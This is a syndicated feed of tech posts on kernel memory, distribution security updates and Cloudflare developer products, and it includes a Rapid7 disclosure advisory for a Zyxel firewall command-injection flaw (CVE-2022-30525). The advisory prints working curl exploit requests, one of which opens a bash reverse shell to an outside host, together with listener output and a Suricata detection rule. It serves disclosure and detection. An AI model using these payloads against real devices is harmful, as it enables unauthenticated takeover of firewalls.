[$] Solutions for direct-map fragmentation

Post Syndicated from original https://lwn.net/Articles/894557/

The kernel’s “direct map” makes the entirety of a system’s physical memory
available in the kernel’s virtual address space. Normally, huge pages are used for
this mapping, making it relatively efficient to access. Increasingly,
though, there is a need to carve some pages out of the direct map; this
splits up those huge pages and makes the system as a whole less efficient.
During a memory-management session at the
2022
Linux Storage, Filesystem, Memory-management and BPF Summit
(LSFMM),
Mike Rapoport led a session on direct-map fragmentation and how it might be
avoided.

Security updates for Thursday

Post Syndicated from original https://lwn.net/Articles/895063/

Security updates have been issued by Fedora (microcode_ctl, mingw-SDL2_ttf, seamonkey, and thunderbird), Mageia (cifs-utils, gerbv, golang, libcaca, libxml2, openssl, python-pillow, python-rencode, python-twisted, python-ujson, slurm, and sqlite3), Red Hat (gzip, kernel, kpatch-patch, podman, rsync, subversion:1.10, and zlib), Scientific Linux (gzip), Slackware (curl), SUSE (clamav), and Ubuntu (curl, firefox, linux, linux-aws, linux-aws-5.13, linux-azure, linux-azure-5.13, linux-gcp, linux-gcp-5.13, linux-hwe-5.13, linux-kvm, linux-oracle, linux-raspi, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-dell300x, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux-snapdragon, linux, linux-aws, linux-azure, linux-azure-5.4, linux-azure-fde, linux-gcp, linux-gcp-5.4, linux-gke, linux-gkeop, linux-gkeop-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi, linux-raspi-5.4, linux, linux-aws, linux-kvm, linux-lts-xenial, and linux-oem-5.14).

CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/

CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection

Rapid7 discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.

The following table contains the affected models and firmware versions.

Affected Model Affected Firmware Version
USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 thru ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN ZLD5.10 thru ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800 ZLD5.10 thru ZLD5.21 Patch 1

The VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.

Product description

The affected firewalls are advertised for both small branch and corporate headquarter deployments. They offer VPN solutions, SSL inspection, web filtering, intrusion protection, and email security, and advertise up to 5 Gbps throughput through the firewall.

The affected models are relatively popular, with more than 15,000 visible on Shodan.

CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection

CVE-2022-30525: Unauthenticated remote command injection

The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user. This vulnerability is exploited through the /ztp/cgi-bin/handler URI and is the result of passing unsanitized attacker input into the os.system method in lib_wan_settings.py. The vulnerable functionality is invoked in association with the setWanPortSt command. An attacker can inject arbitrary commands into the mtu or the data parameter. Below is an example curl that will cause the firewall to execute ping 192.168.1.220:

curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler

On the firewall, the ps output looks like the following:

nobody   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  \_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL
nobody   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   \_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
nobody   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       \_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1
nobody   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           \_ ping 192.168.1.220

A reverse shell can be established using the normal bash GTFOBin. For example:

curl -v --insecure -X POST -H "Content-Type: application/json" -d '
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":
"1","vlanid":"5","mtu":"; bash -c \"exec bash -i &>/dev/tcp/
192.168.1.220/1270 <&1;\";","data":"hi"}' https://192.168.1.1
/ztp/cgi-bin/handler

The resulting reverse shell can be used like so:

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 192.168.1.1 37882
bash: cannot set terminal process group (11037): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$ id
id
uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
bash-5.1$ uname -a
uname -a
Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
Bash-5.1

Metasploit module

A Metasploit module has been developed for these vulnerabilities. The module can be used to establish a nobody Meterpreter session. The following video demonstrates exploitation:



CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection

We’ve shared a PCAP that captures Metasploit’s exploitation of a Zyxel USG FLEX 100. The PCAP can be found attached to the module’s pull request. The Metasploit module injects commands in the mtu field, and as such, the following Suricata rule should flag its use:

alert http any any -> any any ( \
    msg:"Possible Zyxel ZTP setWanPortSt mtu Exploit Attempt"; \
    flow:to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/ztp/cgi-bin/handler"; \
    http.request_body; content:"setWanPortSt"; \
    http.request_body; content:"mtu"; \
    http.request_body; pcre:"/mtu["']\s*:\s*["']\s*[^0-9]+/i";
    classtype:misc-attack; \
    sid:221270;)

Credit

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Remediation

Apply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2022-30525 with a remote vulnerability check.

Disclosure timeline

Astute readers will notice this timeline is a little atypical for Rapid7 disclosures. In accordance with our 60-day disclosure policy, we suggested a coordinated disclosure date in June. Instead, Zyxel released patches to address this issue on April 28, 2022. At that time, Zyxel did not publish an associated CVE or security advisory. On May 9, Rapid7 independently discovered Zyxel’s uncoordinated disclosure. The vendor then reserved CVE-2022-30525.

This patch release is tantamount to releasing details of the vulnerabilities, since attackers and researchers can trivially reverse the patch to learn precise exploitation details, while defenders rarely bother to do this. Therefore, we’re releasing this disclosure early in order to assist defenders in detecting exploitation and to help them decide when to apply this fix in their own environments, according to their own risk tolerances. In other words, silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues.

April 2022 – Discovered by Jake Baines
April 13, 2022 – Rapid7 discloses to [email protected]. Proposed disclosure date June 21, 2022.
April 14, 2022 – Zyxel acknowledges receipt.
April 20, 2022 – Rapid7 asks for an update and shares delight over “Here is how to pronounce ZyXEL’s name”.
April 21, 2022 – Zyxel acknowledges reproduction of the vulnerabilities.
April 28, 2022 – Zyxel releases patches without coordination with vulnerability reporter.
April 29, 2022 – Zyxel indicates patch is likely to release before June 14, 2022.
May 9, 2022 – Rapid7 realizes Zyxel already issued patches. Rapid7 asks Zyxel for a response on the silent patches and indicates that our team will publicly disclose the week of May 9, 2022.
May 10, 2022 – Zyxel reserves CVE-2022-30525 and proposes a new disclosure schedule.
May 12, 2022 – This disclosure bulletin and Metasploit module published.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Announcing Pub/Sub: Programmable MQTT-based Messaging

Post Syndicated from Matt Silverlock original https://blog.cloudflare.com/announcing-pubsub-programmable-mqtt-messaging/

Announcing Pub/Sub: Programmable MQTT-based Messaging

Announcing Pub/Sub: Programmable MQTT-based Messaging

One of the underlying questions that drives Platform Week is “how do we enable developers to build full stack applications on Cloudflare?”. With Workers as a serverless environment for easily deploying distributed-by-default applications, KV and Durable Objects for caching and coordination, and R2 as our zero-egress cost object store, we’ve continued to discuss what else we need to build to help developers both build new apps and/or bring existing ones over to Cloudflare’s Developer Platform.

With that in mind, we’re excited to announce the private beta of Cloudflare Pub/Sub, a programmable message bus built on the ubiquitous and industry-standard MQTT protocol supported by tens of millions of existing devices today.

In a nutshell, Pub/Sub allows you to:

  • Publish event, telemetry or sensor data from any MQTT capable client (and in the future, other client-facing protocols)
  • Write code that can filter, aggregate and/or modify messages as they’re published to the broker using Cloudflare Workers, and before they’re distributed to subscribers, without the need to ferry messages to a single “cloud region”
  • Push events from applications in other clouds, or from on-prem, with Pub/Sub acting as a programmable event router or a hook into persistent data storage (such as R2 or KV)
  • Move logic out of the client, where it can be hard (or risky!) to push updates, or where running code on devices raises the materials cost (CPU, memory), while still keeping latency as low as possible (your code runs in every location).

And there’s likely a long list of things we haven’t even predicted yet. We’ve seen developers build incredible things on top of Cloudflare Workers, and we’re excited to see what they build with the power of a programmable message bus like Pub/Sub, too.

Why, and what is, MQTT?

If you haven’t heard of MQTT before, you might be surprised to know that it’s one of the most pervasive “messaging protocols” deployed today. There are tens of millions (at least!) of devices that speak MQTT today, from connected payment terminals through to autonomous vehicles, cell phones, and even video games. Sensor readings, telemetry, financial transactions and/or mobile notifications & messages are all common use-cases for MQTT, and the flexibility of the protocol allows developers to make trade-offs around reliability, topic hierarchy and persistence specific to their use-case.

We chose MQTT as the foundation for Cloudflare Pub/Sub as we believe in building on top of open, accessible standards, as we did when we chose the Service Worker API as the foundation for Workers, and with our recently announced participation in the Winter Community Group around server-side runtime APIs. We also wanted to enable existing clients an easy path to benefit from Cloudflare’s scale and programmability, and ensure that developers have a rich ecosystem of client libraries in languages they’re familiar with today.

Beyond that, however, we also think MQTT meets the needs of a modern “publish-subscribe” messaging service. It has flexible delivery guarantees, TLS for transport encryption (no bespoke crypto!), a scalable topic creation and subscription model, extensible per-message metadata, and importantly, it provides a well-defined specification with clear error messages.

With that in mind, we expect to support many more “on-ramps” to Pub/Sub: a lot of the best parts of MQTT can be abstracted away from clients who might want to talk to us over HTTP or WebSockets.

Building Blocks

Given the ability to write code that acts on every message published to a Pub/Sub Broker, what does it look like in practice?

Here’s a simple-but-illustrative example of handling Pub/Sub messages directly in a Worker. We have clients (in this case, payment terminals) reporting back transaction data, and we want to capture the number of transactions processed in each region, so we can track transaction volumes over time.

Specifically, we:

  1. Filter on a specific topic prefix for messages we care about
  2. Parse the message for a specific key:value pair as a metric
  3. Write that metric directly into Workers Analytics Engine, our new serverless time-series analytics service, so we can directly query it with GraphQL.

This saves us having to stand up and maintain an external metrics service, configure another cloud service, or think about how it will scale: we can do it all directly on Cloudflare.

# language: TypeScript

async function pubsub(
  messages: Array<PubSubMessage>,
  env: any,
  ctx: ExecutionContext
): Promise<Array<PubSubMessage>> {
  
  for (let msg of messages) {
    // Extract a value from the payload and write it to Analytics Engine
    // In this example, a transactionsProcessed counter that our clients are sending
    // back to us.
    if (msg.topic.startsWith(“/transactions/”)) {
      // This is non-blocking, and doesn’t hold up our message
      // processing.
      env.TELEMETRY.writeDataPoint({
        // We label this metric so that we can query against these labels
        labels: [`${msg.broker}.${msg.namespace}`, msg.payload.region, msg.payload.merchantId],
        metrics: [msg.payload.transactionsProcessed ?? 0]
      });
    }
  }

  // Return our messages back to the Broker
  return messages;
}

const worker = {
  async fetch(req: Request, env: any, ctx: ExecutionContext) {
    // Critical: you must validate the incoming request is from your Broker
    // In the future, Workers will be able to do this on your behalf for Workers
    // in the same account as your Pub/Sub Broker.
    if (await isValidBrokerRequest(req)) {

      // Parse the incoming PubSub messages
      let incomingMessages: Array<PubSubMessage> = await req.json();
      
      // Pass the message to our pubsub handler, and capture the returned
      // messages
      let outgoingMessages = await pubsub(incomingMessages, env, ctx);

      // Re-serialize the messages and return a HTTP 200 so our Broker
      // knows we’ve successfully handled them
      return new Response(JSON.stringify(outgoingMessages), { status: 200 });
    }

    return new Response("not a valid Broker request", { status: 403 });
  },
};

export default worker;

We can then query these metrics directly using a familiar language: SQL. Our query takes the metrics we’ve written and gives us a breakdown of transactions processed by our payment devices, grouped by merchant (and again, all on Cloudflare):

SELECT
  label_2 as region,
  label_3 as merchantId,
  sum(metric_1) as total_transactions
FROM TELEMETRY
WHERE
  metric_1 > 0
  AND timestamp >= now() - 604800
GROUP BY
  region,
  merchantId
ORDER BY
  total_transactions DESC
LIMIT 10

You could replace or augment the calls to Analytics Engine with any number of examples:

  • Asynchronously writing messages (using ctx.waitUntil) on specific topics to our R2 object storage without blocking message delivery
  • Rewriting messages on-the-fly with data populated from KV, before the message is pushed to subscribers
  • Aggregate messages based on their payload and HTTP POST them to legacy infrastructure hosted outside of Cloudflare

Pub/Sub gives you a way to get data into Cloudflare’s network, filter, aggregate and/or mutate it, and push it back out to subscribers — whether there’s 10, 1,000 or 10,000 of them listening on that topic.

Where are we headed?

As we often like to say: we’re just getting started. The private beta for Pub/Sub is just the beginning of our journey, and we have a long list of capabilities we’re already working on.

Critically, one of our priorities is to cover as much of the MQTT v5.0 specification as we can, so that customers can migrate existing deployments and have it “just work”. Useful capabilities like shared subscriptions that allow you to load-balance messages across many subscribers; wildcard subscriptions (both single- and multi-tier) for aggregation use cases, stronger delivery guarantees (QoS), and support for additional authentication modes (specifically, Mutual TLS) are just a few of the things we’re working on.

Beyond that, we’re focused on making sure Pub/Sub’s developer experience is the best it  can be, and during the beta we’ll be:

  • Supporting a new set of “pubsub” sub-commands in Wrangler, our developer CLI, so that getting started is as low-friction as possible
  • Building ‘native’ bindings (similar to how Workers KV operates) that allow you to publish messages and subscribe to topics directly from Worker code, regardless of whether the message originates from (or is destined for) a client beyond Cloudflare
  • Exploring more ways to publish & subscribe from non-MQTT based clients, including HTTP requests and WebSockets, so that integrating existing code is even easier.

Our developer documentation will cover these capabilities as we land them.

We’re also aware that pricing is a huge part of developer experience, and are committed to ensuring that there is an accessible and flexible free tier. We want to enable developers to experiment, prototype and solve problems we haven’t thought of yet. We’ll be sharing more on pricing during the course of the beta.

Getting Started

If you want to start using Pub/Sub, sign up for the private beta: we plan to start enabling access within the next month. We’re looking forward to collecting feedback from developers and seeing what folks start to build.

In the meantime, review the brand-new Pub/Sub developer documentation to understand how Pub/Sub works under the hood, the MQTT protocol, and how it integrates with Cloudflare Workers.

How we built config staging and versioning with HTTP applications

Post Syndicated from Garrett Galow original https://blog.cloudflare.com/version-and-stage-configuration-changes-with-http-applications/

How we built config staging and versioning with HTTP applications

How we built config staging and versioning with HTTP applications

Last December, we announced a closed beta of a new product, HTTP Applications, giving customers the ability to better control their L7 Cloudflare configuration with versioning and staging capabilities. Today, we are expanding this beta to all enterprise customers who want to participate. In this post, I will talk about some of the improvements that have landed and go into more detail about how this product works.

HTTP Applications

A quick recap of what HTTP Applications are and what they can do. For a deeper dive on how to use them see the previous blog post.

As previously mentioned: HTTP Applications are a way to manage configuration by use case, rather than by hostname. Each HTTP Application has a purpose, whether that is handling the configuration of your marketing website or an internal application. Each HTTP Application consists of a set of versions where each represents a snapshot of settings for managing traffic — Page Rules, Firewall Rules, cache settings, etc.  Each version of configuration inside the HTTP Application is independent of the others, and when a new version is created, it is initialized as a copy of the version that preceded it.

An HTTP Application can be represented with the following diagram:

How we built config staging and versioning with HTTP applications

Each HTTP Application is sourced from an existing zone. That zone’s current configuration will be copied to instantiate the first version of the HTTP Application. After that any changes made to the zone or version 1 will be independent of the other. Versions themselves don’t affect any traffic for a zone until they are deployed via the use of Routing Rules.

Routing Rules

Unlike zones, each version of an HTTP Application is independent of any specific hostname. So if versions are not tied to a hostname, like zones, then how do you decide which version of an HTTP Application will affect a specific set of traffic? The answer is Routing Rules. With Routing Rules, you get to decide which version of an HTTP Application is applied to traffic. Routing Rules are powered by Cloudflare’s Ruleset Engine and rely on the use of conditional “if, then” rules to map hostnames controlled in your Cloudflare account to a version of configuration. As an example, a rule could be:

If zone.name = `example.com`
Then use configuration of HTTP Application id: xyz, version 2

When this rule executes on our global network, instead of applying the regular zone configuration of example.com, we will instead use the configuration defined in version 2 of the HTTP Application.

Expanding the previous diagram we get the following:

How we built config staging and versioning with HTTP applications

The combination of Routing Rules and HTTP Applications means you can ‘stage’ a set of changes, via a version, without requiring a separate staging zone as has been required in the past. Cloudflare will provide you with specific IPs that can be used to test the configuration before rolling it out to production. This means you can catch misconfigurations in rules or other settings before it impacts your customers.

How HTTP Applications and Routing Rules work

Let’s break down how this all works behind the scenes and gives you a safe way to test changes to your configuration. In all of Cloudflare’s data centers around the world, every request is first inspected and associated with an account/config pair so that we know what configuration settings we should apply to this request. If you have the zone ‘example.com’, with an id of 123, in your account, with an id of 777, then when a request for example.com/cat.jpg arrives at the Cloudflare network, the ownership lookup will return a value like 777:123 which then denotes the account and config settings we should use to process that request.

When HTTP Applications and Routing Rules are being used, the ownership lookup occurs as normal, but instead of loading configuration based on the zone for the account:config pair, Cloudflare does one additional lookup to see if any routing rules are in place that would change which configuration should be used. If a rule exists like before:

If zone.name = `example.com`
Then use configuration of HTTP Application id: xyz, version 2

Then when ownership is evaluated, instead of loading configuration for account:config 777:123, Cloudflare will load the configuration of the version of that HTTP Application, let’s say that version 2 from the rule has a config id of 456. Then the lookup value for loading configuration will instead be 777:456.

How we built config staging and versioning with HTTP applications

Because Routing Rules are implemented with the Ruleset Engine, we can implement a special type of rule to allow a version to be staged such that it is only executed for requests when the request is sent to IPs reserved for testing. The resulting diagram is almost the same, but because the request is being sent to staging IPs, Cloudflare’s network will route that request to a different version of the HTTP Application that has a set of changes not yet deployed for all other traffic.

How we built config staging and versioning with HTTP applications

This is what enables you to safely test a set of changes and then simultaneously deploy the exact same configuration to all traffic. If anything goes wrong when testing in staging or rolling out to production, you can simply roll back the configuration to the previous version that was deployed. No need to try and hunt down what settings may have changed. That investigation can be done after the issue has been resolved through a quick, one-click rollback.

Now available for Enterprise Customers

HTTP Applications and Routing Rules put power and safety in customer’s hands so that configuration changes can be made more easily. When issues do arise they can be resolved quickly through rollbacks. We will continue to be expanding the capabilities offered throughout the year, but if you are interested in trying it out now and are an enterprise customer, talk to your account manager to get access!

Introducing Custom Domains for Workers

Post Syndicated from Kabir Sikand original https://blog.cloudflare.com/custom-domains-for-workers/

Introducing Custom Domains for Workers

Introducing Custom Domains for Workers

Today, we’re happy to announce Custom Domains for Workers. Custom Domains allow you to hook up a domain to your Worker, without having to fuss about certificates, origin servers or DNS – it just works. Let’s take a look at how we built Custom Domains and how you can use them.

The magic of Cloudflare DNS

Under the hood, we’re leveraging Cloudflare DNS to register your Worker as the origin for your domain. All you need to do is head to your Worker, go to the Triggers tab, and click Add Custom Domain. Cloudflare will handle creating the DNS record and issuing a certificate on your behalf. In seconds, your domain will point to your Worker, and all you need to worry about is writing your code. We’ll also help guide you through the process of creating these new records and replace any existing ones. We built this with a straightforward ethos in mind: we should be clear and transparent about actions we’re taking, and make it easy to understand.

We’ve made a few welcome changes when you’re using a Custom Domain on your Worker. First off, when you send a request to any path on that Custom Domain, your Worker will be triggered. No need to create a route with /* at the end.

Introducing Custom Domains for Workers

Second, your Custom Domain Worker is considered the ‘origin server’. That means, no need to `fetch(event.request)` once you’re in that Worker; instead, talk to any internal or external services you need to by creating request objects in your code, or talk to other Workers services using any of our available bindings. We’ve increased the limit of external requests you can make, when using our Unbound usage model, to 1,000. You can talk to any services you’d like to – things like payment, communication, analytics, or tracking services come to mind, not to mention your databases. If that’s not enough for your use case, feel free to reach out via Discord or support, and we’ll happily chat.

Introducing Custom Domains for Workers

Finally, what if you need to talk to your Worker from another one? Since these Workers act as an origin server, you can just send a normal request to the associated endpoint, and we’ll invoke that Worker – even if it’s on the same Cloudflare zone.

Introducing Custom Domains for Workers

Let’s build an example application

We’ll start by writing our application. I have an example that I’ve called api-gateway below. It checks the incoming request path, and delegates work to downstream Workers using Service Bindings. For any privileged endpoints, it performs an authorization check before executing that code:

export default {
 async fetch(request, environment) {
   const url = new URL(request.url);
   switch (url.pathname) {
     case '/login':
       return await environment.login.fetch(request);

     case '/logout':
       return await environment.logout.fetch(request);

     case '/admin': {
       // Check that the "Authorization" header is sent when authenticated.
       const authCheck = await environment.auth.fetch(request.clone());
       if (authCheck.status != 200) { return authCheck }
       // If the auth check passes, send the request to the /admin endpoint
       return await environment.admin.fetch(request);
     }

     case '/robots.txt':
       return new Response(null, { status: 204 });
   }
   return new Response('Not Found.', { status: 404 });
 }
}```

Now that I have a working application, I want to serve it on my Custom Domain. To hook this up, head over to Workers, Triggers, click ‘Add Custom Domain’, and type in your desired hostname. You’ll be guided through a simple workflow to generate your new Worker record, and your Worker will be the target.

Best of all, with Custom Domains you can reap the performance benefits of DNS-routable Workers; Cloudflare never has to look through a routing table to invoke your Worker. And, by leveraging Service Bindings, you can customize your routing to your heart’s content – using URL parameters, headers, request content, or query strings to appropriately invoke the right Worker at the right time.

We’re excited to see what you build with Custom Domains. Custom Domains are available in an Open Beta starting today. Support is built right into the Cloudflare Dashboard and API’s, and CLI support via Wrangler is coming soon.

Introducing Pages Plugins

Post Syndicated from Nevi Shah original https://blog.cloudflare.com/cloudflare-pages-plugins/

Introducing Pages Plugins

Introducing Pages Plugins

Last November, we announced that Pages is now a full-stack development platform with our open beta integration with Cloudflare Workers. Using file-based routing, you can drop your Pages Functions into a /functions folder and deploy them alongside your static assets to add dynamic functionality to your site. However, throughout this beta period, we observed the types of projects users have been building, noticed some common patterns, and identified ways to make these users more efficient.

There are certain functionalities that are shared between projects; for example, validating authorization headers, creating an API server, reporting errors, and integrating with third-party vendors to track aspects like performance. The frequent need for these patterns across projects made us wonder, “What if we could provide the ready-made code for developers to add to their existing project?”

Introducing Pages Plugins!

What’s a Pages Plugin?

With Pages Functions, we introduced file-based routing, so users could avoid writing their own routing logic, significantly reducing the amount of boilerplate code a typical application requires. Pages Plugins aims to offer a similar experience!

A Pages Plugin is a reusable – and customizable – chunk of runtime code that can be incorporated anywhere within your Pages application. A Plugin is effectively a composable Pages Function, granting Plugins the full power of Functions (and therefore, Workers), including the ability to set up middleware, parameterized routes, and static assets.

How does it work?

Today, Pages Plugins is launching with a couple of ready-made solutions for Sentry, Honeycomb, and Stytch (more below), but it’s important to note that developers anywhere can create and share their Pages Plugins, too! You just need to install a Plugin, mount it to a route within the /functions directory, and configure the Plugin according to its needs.

Let’s take a look at a Plugins example for a hypothetical ACME logger:

Assume you find an @acme/pages-plugin-logger package on npm and want to use it within your application – you’d install, import, and invoke it as you would any other npm module. After passing through the required (hypothetical) configuration and mounting it as the top-level middleware’s onRequest export, the ACME logger will be reporting on all incoming requests:

// file: /functions/_middleware.ts

import MyLogger from "@acme/pages-plugin-logger";

// Setup logging for all URL routes & methods
export const onRequest = MyLogger({
 endpoint: "https://logs.acme.com/new",
 secret: "password",
});

You can help grow the Plugins ecosystem by building and sharing your Plugins on npm and our developer documentation, and you can immediately get started by using one of Cloudflare’s official launch partner Plugins today.

Introducing our Plugins launch partners

With Pages, we’re always working to see how we can best cater to user workflows by integrating directly with users’ preferred tools. We see Plugins as an excellent opportunity to collaborate with popular third-party observability, monitoring, and authentication providers to provide their own Pages Plugins.

Today, we’re proud to launch our Pages Plugins with Sentry, Honeycomb and Stytch as official partners!

Introducing Pages Plugins

Sentry

Sentry provides developer-first application monitoring for real-time insights into your production deployments. With Sentry you can see the errors, crashes, or latencies experienced while using your app and get the deep context needed to solve issues quickly, like the line of code where the error occurred, the developer or commit that introduced the error, or the API call or database query causing the slowdown. The Sentry Plugin automatically captures any exceptions in your Pages Functions and sends them to Sentry where you can aggregate, analyze, and triage any issues your application encounters.

// ./functions/_middleware.ts

import sentryPlugin from "@cloudflare/pages-plugin-sentry";

export const onRequest = sentryPlugin({
 dsn: "YOUR_SENTRY_DSN",
});

Honeycomb

Similarly, Honeycomb is also an observability and monitoring platform meant to visualize, analyze and improve application quality and performance to help you find patterns and outliers in your application data. The Honeycomb Plugin creates traces for every request that your Pages application receives and automatically sends that information to Honeycomb for analysis.

// ./functions/_middleware.ts

import honeycombPlugin from "@cloudflare/pages-plugin-honeycomb";

export const onRequest = honeycombPlugin({
 apiKey: "YOUR_HONEYCOMB_API_KEY",
 dataset: "YOUR_HONEYCOMB_DATASET_NAME",
});

Stytch

Observability is just one use case of how Pages Plugins can help you build a more powerful app. Stytch is an API-first platform that improves security and promotes a better user experience with passwordless authentication. Our Stytch Plugin transparently validates user sessions, allowing you to easily protect parts of your application behind a Stytch login.

// ./functions/_middleware.ts

import stytchPlugin from "@cloudflare/pages-plugin-stytch";
import { envs } from "@cloudflare/pages-plugin-stytch/api";

export const onRequest = stytchPlugin({
  project_id: "YOUR_STYTCH_PROJECT_ID",
  secret: "YOUR_STYTCH_PROJECT_SECRET",
  env: envs.live
});

More Plugins, more fun!

As a developer platform, it’s crucial to build relationships with the creators of the tooling and frameworks you use alongside Pages, and we look forward to growing our partnership ecosystem even more in the future. However, beyond partnerships, we realize there are some more extremely useful Plugins that we built out to get you started!

  • Google Chat: creates a Google Chat bot which can respond to messages. It also includes an API for interacting with Google Chat (for example, for creating messages) without the need for user input. This API is useful for situations such as alerts.
  • Cloudflare Access: a middleware to validate Cloudflare Access JWT assertions. It also includes an API to lookup additional information about a given user’s JSON Web Token.
  • Static forms: intercepts static HTML form submissions and can perform actions such as storing the data in KV.
  • GraphQL: creates a GraphQL API for a given schema. It also ships with the GraphQL Playground to simplify development and help you test out your API.

Over the next couple of months we will be working to build out some of the most requested Plugins relevant to your projects. For now, you can find all officially supported Plugins in our developer documentation.

No time to wait? Author your own!

But don’t let us be your bottleneck! The beauty of Plugins is how easy they are to create and distribute. In fact, we encourage you to try out our documentation in order to create and share your own Plugin because chances are if you’re building a Plugin for your own project, there is someone else who would benefit greatly from it too!

We’re excited to see Plugins from the community solving their own common use-cases or as integrations with their favorite platforms. Once you’ve built a Plugin, you can surface your work if you choose by creating a PR against the Community Plugins page in our documentation. This way any Pages user can read about your Plugin and mount it in their own Pages application.

What’s next for Pages Functions

As you try out Plugins and take advantage of our Functions offering, it’s important to note there are some truly exciting updates coming soon. As we march toward the Functions general availability launch, we will provide proper analytics and logging, so you can have better insight into your site’s performance and visibility into issues for debugging. Additionally, with R2 now in open beta, and D1 in the works, we’re excited to provide support for R2 and D1 bindings for your full stack Pages projects soon!

Of course, because Functions is still in open beta, we currently offer 100k requests per day for free, however, as we aim for general availability of Functions, you can expect a billing model similar to the Workers Paid billing model.

Share what you build

While you begin building out your Plugin, be sure to reach out to us in our Cloudflare Developers Discord server in the #pages-plugins channel. We’d love to see what you’re building and help you along the way!

Our growing Developer Platform partner ecosystem

Post Syndicated from Dawn Parzych original https://blog.cloudflare.com/developer-platform-ecosystem/

Our growing Developer Platform partner ecosystem

Our growing Developer Platform partner ecosystem

Deploying an application to the cloud requires a robust network, ample storage, and compute power. But that only covers the architecture, it doesn’t include all the other tools and services necessary to build, deploy, and support your applications. It’s easy to get bogged down in researching whether everything you want to use works together, and that takes time away from actually developing and building.

Cloudflare is focused on building a modern cloud with a developer-first experience. That developer experience includes creating an ecosystem filled with the tools and services developers need.

Deciding to build an application starts with the planning and design elements. What programming languages, frameworks, or runtimes will be used? The answer to that question can influence the architecture and hosting decisions. Choosing a runtime may lock you into using specific vendors. Our goal is to provide flexibility and eliminate the friction involved when wanting to migrate on to (or off) Cloudflare.

You can’t forget the tools necessary for configuration and interoperability. This can include areas such as authentication and infrastructure management. You have multiple pieces of your application that need to talk with one another to ensure a secure and seamless experience. We support and build standards for compatibility and to simplify the configuration and interoperability when deploying your applications.

During the build process and after your application has been deployed, it is essential to test and verify that things are working properly. This is where logging, analytics, and alerting come in. Having the ability to quickly be notified when something isn’t working properly is part of the equation. The other part is reducing the context switching among various debugging tools and applications to quickly resolve the issue.

And finally, improving your application through iterating and extending functionality. This can come from adding plug-ins from third party providers, running A/B tests to determine whether a feature is moving in the right direction, or not.

At Cloudflare our mission is to help build a better Internet, all of these elements are necessary to achieve this. Our focus is on providing the network, storage, and compute power to deliver apps. We look to partners to help in the other areas and provide an ecosystem. Our intention with this strategy is to get out of the way, so developers can build faster and safer.

To achieve our mission we look for partners with similar philosophies. We’ve previously announced integrations around

Everything we do is built on the foundation of the open Internet and open standards. We want to provide choice to developers to pick from a variety of tools and may the best solution win. We believe developers should have the freedom and flexibility to choose the best tool ‘for their work’ not the best for within a ‘locked-in-platform’.

We understand that partnering is key to achieving the above goal. Today, we’re excited to announce a growing ecosystem of partners who are tapping into our world’s best network. Our developer platform products and partner products fit seamlessly into existing stacks and improve developer productivity through simple development and deploy workflows.

Our growing Developer Platform partner ecosystem

Source, build and deploy partners:

Along with having the best network in the world, we also have really good compute and database products. However, for developers to plan, build and continuously iterate, they need a host of other services to work together seamlessly to have a great building experience end to end. This is why we partnered with DevOps platforms and CMSs to make the entire development lifecycle better.

On the DevOps front, developers can create new Pages projects by connecting thier repos stored on GitLab or GitHub and make site changes there via the usual git commands.

Our growing Developer Platform partner ecosystem

“Developers can be more productive when they create, test, secure, and deploy software from a single DevOps application instead of bouncing between multiple different tools. Cloudflare Pages’ integration with GitLab makes it easier for joint users to develop and deploy new code to Cloudflare’s network using the same syntax and git commands they’re already comfortable using.”
— Michael LeBeau, Alliance Manager at GitLab

Also, on the CMS front, we have built deploy hooks that are the key to what allows developers to connect and trigger deployments in Cloudflare Pages via updates made in their favorite headless CMSs.

